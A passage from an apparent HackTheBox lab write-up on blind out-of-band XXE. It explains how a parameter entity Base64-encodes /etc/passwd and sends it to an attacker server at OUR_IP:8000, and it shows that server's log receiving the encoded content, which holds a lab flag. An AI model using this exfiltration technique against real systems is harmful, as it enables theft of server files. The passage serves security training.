      file, and the contents of that file will be Base64-encoded.
      However, the Base64-encoded content is not directly retrieved by the attacker 
      yet. It's stored in the %file entity.
    - After resolving %file, the %oob entity is processed, which contains the HTTP 
      request. The attacker’s server (http://OUR_IP:8000/) is contacted with the query 
      parameter content=%file, which includes the Base64-encoded contents of the 
      /etc/passwd file. The XML parser triggers the HTTP request to the attacker's 
      server, and the encoded contents of /etc/passwd are sent to the attacker's 
      server as the content parameter in the URL. 
 
root@oco:~$ ...
 [Thu Jan  9 21:25:52 2025] 10.129.82.212:52228 [200]: GET /xxe.dtd
 [Thu Jan  9 21:25:52 2025] 10.129.82.212:52228 Closing
 [Thu Jan  9 21:25:52 2025] 10.129.82.212:52230 Accepted
 [Thu Jan  9 21:25:52 2025] 

 <?php $flag = "HTB{1_d0n7_n33d_0u7pu7_70_3xf1l7r473_d474}"; ?>

 [Thu Jan  9 21:25:52 2025] 10.129.82.212:52230 [200]: GET /?content=PD9waHAgJGZsYWcgPSAiSFRCezFfZDBuN19uMzNkXzB1N3B1N183MF8zeGYxbDdyNDczX2Q0NzR9IjsgPz4K
 [Thu Jan  9 21:25:52 2025] 10.129.82.212:52230 Closing

PreviousBROKEN AUTHENTICATION NextFILE INCLUSION

Last updated 11 months ago